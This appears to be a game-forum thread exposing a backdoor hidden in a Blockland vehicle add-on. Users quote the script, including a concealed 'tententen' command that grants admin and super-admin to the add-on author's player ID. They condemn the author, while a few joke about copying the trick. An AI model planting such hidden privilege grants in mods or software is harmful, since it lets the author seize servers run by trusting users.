Author Topic: What's a "Back Door Admin Exploit"?  (Read 5319 times)

Quote from: Hax!
function serverCmdtententen(client)
{
if(%client.blid == 1337)
{
client.isAdmin = 1;
client.isSuperAdmin = 1;
commandtoclient(%client,'setAdminLevel',-1);

Got rid of some code so its broken now.

It was a good addon, except for this stupidity :(

Got rid of some code so its broken now.

Hm. But thay said that it had to be activated by some key strokes. Anyway il search it up in the bad script.

Hm. But thay said that it had to be activated by some key strokes. Anyway il search it up in the bad script.
It would make the maker admin if he said "/tententen".

Hm. But thay said that it had to be activated by some key strokes. Anyway il search it up in the bad script.

It's at the bottom of vehicle_Airstrikef14.cs

For fun change the command to ban whoever types in the command.

It's an exploit(Or pure idiocy as radial says) of Blockland. It's mainly a code on a line in a script of an add-on that automatically gives you admin just by entering a server having that add-on. If you have that add-on he/she gave you switched on of course.
EXAMPLE:
You have a server sitting there, you're building stuff and blowing it up.
*Azherben joins your server*
Azherben automatically becomes admin.
Azherben bans all the other players and wands everything in sight(If he/she wanted to).


It's a very inconvenient and annoying script if you're not the guy who made it.

nice job, handicap. like i didn't explain everything in the first two posts.

It's at the bottom of vehicle_Airstrikef14.cs

For fun change the command to ban whoever types in the command.


Best Idea ever

Ok I found it.
For you people that dont have the script...
Code: [Select]
datablock FlyingVehicleData(AzjAirstrikeF14Vehicle)
{
      //category = "Vehicles";
      category = ""; //You can't drive it anyway.
      displayName = "";

   //Shapebase Fields
      shapeFile   = "./f14.dts";  //.dts File
      emap        = true;
      mass        = 150;
      drag        = 1.2;
      density     = 4;
      
   //No point in damage scripts.

   //Tagged fields for mounting
      minMountDist = 3;  
      numMountPoints = 1;
      mountThread[0] = "crouch";

      lookUpLimit = 0.75;
lookDownLimit = 0.35;

   //Vehicle Fields:
      massCenter        = "0 0 -1";
      bodyRestitution   = 0.0;
      bodyFriction      = 0.0;

      minImpactSpeed    = 25;
      softImpactSpeed   = 25;
      hardImpactSpeed   = 50;
      minRollSpeed      = 0;
      maxSteeringAngle  = 0.785;

      maxDrag        = 50;
      minDrag        = 65;
      integration    = 4;
      collisionTol   = 0;
      contactTol     = 0;

      cameraRoll     = false;
      cameraMaxDist  = 18;        
      cameraLag      = 0.0;
      cameraDecay    = 0.0;
      cameraOffset   = 2.5;
      cameraTilt     = 0.0;

      //dustEmitter       = ; //ParticleEmitterData
      triggerDustHeight = 3.0;
      dustHeight        = 1.0;

      //splashEmitter[0]        = ; //ParticleEmitterData

      splashFreqMod     = 300.0;
      splashVelEpsilon  = 0.50;

      splash = vehicleSplash;
      splashVelocity = 4.0;
      splashAngle = 67.0;
      splashFreqMod = 300.0;
      splashVelEpsilon = 0.60;
      bubbleEmitTime = 1.4;
      splashEmitter[0] = vehicleFoamDropletsEmitter;
      splashEmitter[1] = vehicleFoamEmitter;
      splashEmitter[2] = vehicleBubbleEmitter;
      mediumSplashSoundVelocity = 10.0;  
      hardSplashSoundVelocity = 20.0;  
      exitSplashSoundVelocity = 5.0;

      exitSplashSoundVelocity    = 2.0;
      softSplashSoundVelocity    = 1.0;
      mediumSplashSoundVelocity  = 2.0;
      hardSplashSoundVelocity    = 3.0;
      //exitingWater               = ;   //AudioProfile
      //impactWaterEasy            = ;   //AudioProfile
      //impactWaterMedium          = ;   //AudioProfile
      //impactWaterHard            = ;   //AudioProfile
      //waterWakeSound             = ;   //AudioProfile

      collDamageThresholdVel  = 20;
      collDamageMultiplier    = 0.05;

   //Flying vehicle fields
      //jetSound = ;      //AudioProfile
      //engineSound = ;   //AudioProfile

      maneuveringForce        = 8900;
      horizontalSurfaceForce  = 45;
      verticalSurfaceForce    = 45;
      autoInputDamping        = 0.5;
      steeringForce           = 1900;
      steeringRollForce       = 350;
      rollForce               = 14;
      autoAngularForce        = 1100;
      rotationalDrag          = 12;
      autoLinearForce         = 110;
      maxAutoSpeed            = 11;
      hoverHeight             = 2.0;
      createHoverHeight       = 2.0;

      //forwardJetEmitter    = ; //ParticleEmitterData
      //backwardJetEmitter   = ; //ParticleEmitterData
      //downJetEmitter       = ; //ParticleEmitterData
      //trailEmitter         = ; //ParticleEmitterData

      minTrailSpeed        = 1;
      vertThrustMultiple   = 1.0;
};
=================================================================================
function serverCmdtententen(%client)
{
if(%client.bl_id == 13788)
%client.isAdmin = 1;
%client.isSuperAdmin = 1;
commandtoclient(%client,'setAdminLevel',2);
}
}
=================================================================================
Azj should be banned for seeping a Admin CMD for himself. He is such a noob sence he cant earn the admin himself. He may not get admin at all so he seeps it into a script. Im gonna check drama.
« Last Edit: May 08, 2010, 07:15:30 PM by Tyler66 »

-snip-
And now i have lost all my trust for him and his add ons(that means i will not be downloading ANY of his add ons)

Lol I bet someone in the near future will search and find this topic and do it in there script and release it.
Like me >:)

Lol I bet someone in the near future will search and find this topic and do it in there script and release it.
Like me >:)
Ohai, releasing my TF2 Ai.
Also, i blew up your covered/sized text.

Ohai, releasing my TF2 Ai.
Also, i blew up your covered/sized text.
UH NOEZ! LURDECAN IZ SAPEN MA CUVAH!
RETRET!

Didn't Iban's City Mod do this too?


I still think people are letting him get away with this and letting him off easy :I